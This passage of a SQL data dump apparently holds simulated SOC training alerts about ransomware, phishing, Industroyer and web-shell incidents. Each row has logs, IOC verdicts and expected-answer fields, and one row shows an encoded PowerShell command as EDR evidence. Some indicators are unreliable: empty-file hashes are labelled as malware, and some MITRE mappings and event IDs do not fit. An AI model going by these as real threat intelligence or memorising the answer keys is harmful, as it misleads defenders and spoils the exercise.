ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil ransomware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Username of compromised 
account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(862, 'Persistence Mechanism Identified', 'high', 'System Logs', 'REvil used sophisticated persistence techniques, embedding themselves within the network to maintain access and control.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_id\":\"4625\",\"source_ip\":\"198.51.100.23\",\"internal_ip\":\"192.168.1.25\",\"user\":\"compromised_user\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\malicious.exe\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"Registry modification detected\",\"logon_type\":\"Interactive\",\"description\":\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\"}', '2026-01-15 00:50:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with REvil command and control infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Executable used by REvil for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known REvil 
payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised as part of the REvil attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.525Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"Registry modification detected\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"description\\\":\\\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.525Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"Registry modification detected\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"description\\\":\\\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.525Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"Registry modification detected\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"description\\\":\\\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.525Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"Registry modification detected\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"description\\\":\\\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.525Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"Registry modification detected\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"description\\\":\\\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(863, 'Unauthorized Access to Internal Systems', 'high', 'User Activity Monitoring', 'During the investigation, it was discovered that the attackers moved laterally across the network, infecting numerous systems with ransomware. This movement was likely enabled by exploiting credentials of a compromised user account, spreading to multiple internal systems to maximize the attack\'s impact.', 'Lateral Movement', 'T1570', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"action\":\"login\",\"status\":\"success\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"ransomware_payload.exe\",\"internal_ip\":\"192.168.1.15\",\"description\":\"Successful login from external IP to internal system with known malware file transfer\"}', '2026-01-15 00:50:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal system targeted by lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as ransomware variant\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"File associated with ransomware activity\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal 
Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials likely compromised during attack\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.526Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"description\\\":\\\"Successful login from external IP to internal system with known malware file transfer\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.526Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"description\\\":\\\"Successful login from external IP to internal system with known malware file 
transfer\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.526Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"description\\\":\\\"Successful login from external IP to internal system with known malware file transfer\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.526Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"description\\\":\\\"Successful login from external IP to internal system with known malware file transfer\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.526Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"description\\\":\\\"Successful login from external IP to internal system with known malware file transfer\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(864, 'Data Exfiltration Detected', 'critical', 'Data Loss Prevention System', 'In the final stage, REvil exfiltrated critical data, threatening its release unless the $70 million ransom demand was met, before the decryption keys were eventually acquired.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T13:45:30Z\",\"event_id\":\"DLP-EXFIL-20231005\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"185.220.101.42\",\"filename\":\"financial_report_2023.xlsx\",\"user\":\"jdoe\",\"hash\":\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\",\"protocol\":\"HTTPS\",\"action\":\"Data Transfer\",\"status\":\"Success\"}', '2026-01-15 00:50:29', '2026-02-16 17:57:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.220.101.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with REvil operations.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP system\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file flagged for unauthorized transfer.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account potentially compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with unauthorized data 
transfer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.527Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.220.101.42\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.527Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.220.101.42\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.527Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.220.101.42\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.527Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.220.101.42\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.527Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.220.101.42\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(865, 'Initial Access via Phishing Campaign', 'high', 'Email Gateway Logs', 'A spear-phishing email was sent to an employee containing a malicious attachment that, when executed, provides the attacker with initial access to the network.', 'Social Engineering', 'T1566.001', 1, 'new', NULL, '{\"email_subject\":\"Urgent: New Company Policy Update\",\"sender_email\":\"hr-updates@company.com\",\"recipient_email\":\"john.doe@victimcompany.com\",\"attachment\":{\"filename\":\"Policy_Update.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"timestamp\":\"2023-10-02T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}', '2026-01-15 00:52:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"hr-updates@company.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known phishing source\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Sandworm\'s known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Campaign\",\"date\":\"2026-02-01T20:32:22.528Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(866, 'Execution of Industroyer Malware', 'critical', 'Endpoint Detection and Response (EDR) Logs', 'The adversary executed Industroyer malware on an industrial control system, posing a significant threat to the power grid\'s operations.', 'Malware Deployment', 'T1496 - Resource Hijacking', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.10.20\",\"username\":\"ics_admin\",\"process_name\":\"industroyer.exe\",\"file_hash\":\"f6c8d8e6a4c3b5d2e9c7f4a1b9e3c5d1\",\"event_description\":\"Execution of Industroyer malware detected on ICS endpoint\",\"severity\":\"high\",\"destination_host\":\"ICS-Server-01\"}', '2026-01-15 00:52:49', '2026-02-16 17:57:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity targeting ICS.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"ICS endpoint within the corporate network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f6c8d8e6a4c3b5d2e9c7f4a1b9e3c5d1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Industroyer malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"industroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Logs\",\"verdict\":\"malicious\",\"details\":\"Executable linked to Industroyer malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"ics_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Authorized user account for ICS 
management.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(867, 'Establishing Persistence through Backdoors', 'high', 'Network Traffic Analysis', 'During the analysis of network traffic, it was identified that the threat actor attempted to maintain prolonged access to critical nodes within the grid infrastructure by deploying backdoors. This action is consistent with advanced persistence techniques aimed at ICS/SCADA systems.', 'Persistence Mechanism', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.0.15\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"HTTPS\",\"username\":\"admin_user\",\"filename\":\"web_shell.jsp\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event\":\"File uploaded\",\"description\":\"Suspicious file upload detected on critical node.\"}', '2026-01-15 00:52:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence 